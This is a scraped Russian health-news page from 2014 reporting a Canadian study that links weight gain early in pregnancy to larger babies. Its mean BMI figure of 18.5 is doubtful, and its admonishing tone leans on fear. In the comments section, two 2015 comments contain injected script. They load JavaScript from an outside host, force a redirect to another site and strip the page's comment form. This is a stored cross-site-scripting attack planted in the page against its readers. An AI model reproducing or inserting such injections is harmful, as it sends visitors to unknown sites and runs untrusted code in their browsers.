Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Набрали вес на ранних сро...  >>  Набрали вес на ранних сроках беременности? У вас будет толстый ребенок!
 
Обратная связь
 

Набрали вес на ранних сроках беременности? У вас будет толстый ребенок!

Размер шрифта
24 января 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Канады представили еще один довод в пользу того, что беременность – это не повод предаваться чревоугодию.

Набрали вес на ранних сроках беременности? У вас будет толстый ребенок!

Исследование с участием 172 беременных женщин проводилось на базе университета Альберты (Канада). Выяснилось, что будущие мамы, набравшие лишний вес в течение первой половины беременности, оказывали медвежью услугу своим детям, вес которых оказывался зачастую намного больше, чем у тех малышей, матери которых держали свой рацион под контролем.

«Полученные нами результаты однозначно указывают на необходимость профилактических бесед среди беременных женщин, в ходе которых необходимо разъяснять опасность раннего набора веса и важность здорового питания и физических упражнений», – убеждена Мардж Дэйвенпорт, одна из авторов исследований.

«Беременные женщины и, тем более, лечащие врачи должны быть в курсе всех официальных рекомендаций относительно контроля веса во время беременности и следовать им неукоснительно. Это, вне всяких сомнений, поспособствует благополучному течению беременности и крепкому здоровью малыша», – утверждает Дэйвенпорт.

Все женщины, принимавшие участие в исследовании, были физически здоровыми и не имели вредных привычек. Среднее значение их индекса массы тела составило 18,5 на сроке от 16 до 20 недель. Значения ИМТ менее 18,5 интерпретировались как недостаточные (патологическая худоба), а в качестве верхней границы нормы было установлено значение 25 (все, что выше, расценивалось как избыточный вес).

Специально для участниц исследования была составлена базовая программа аэробных упражнений (суммарная продолжительность – 3-4 часа в неделю). Также им были предоставлены все диетические рекомендации в письменном виде.

В итоге оказалось, что более половины женщин (52%) набрали лишний вес в течение беременности. Однако негативные последствия для плода этот феномен имел только в том случае, когда будущие мамы «округлялись» в первую половину беременности: патологически большие и тяжелые плоды в этом случае отмечались почти в три раза чаще.

«Таким образом, можно с уверенностью утверждать, что грамотная диета и адекватная физическая нагрузка имеют значительное позитивное значение в долгосрочной перспективе», – говорит Дэйвенпорт. «Дети, которые рождаются с избыточным весом, предрасположены к развитию тяжелых метаболических нарушений в будущем».

Поэтому избавьтесь от опасной иллюзии, что во время беременности можно есть в неограниченных количествах. Помните: за вашу беспечность будет расплачиваться ваш ребенок!

Хотите стать идеальной мамой? Мы знаем об этом все, поэтому обратитесь к материалам нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Толстейте на здоровье! Сколько лишних килограммов нужно беременным?!   Как воспитывать ребенка, чтобы он не был толстым?   Кесарю кесарево, а ребенку, родившемуся с помощью кесарева сечения, лишний вес!   ВИЧ и беременность. Как защититься?  
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 

Слайдшоу

1
Ошибки, которые не позволят вам похудеть к Новому году
Можно ли подгадать с беременностью?
Супереда для новоиспеченной мамашки

Тесты

1
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.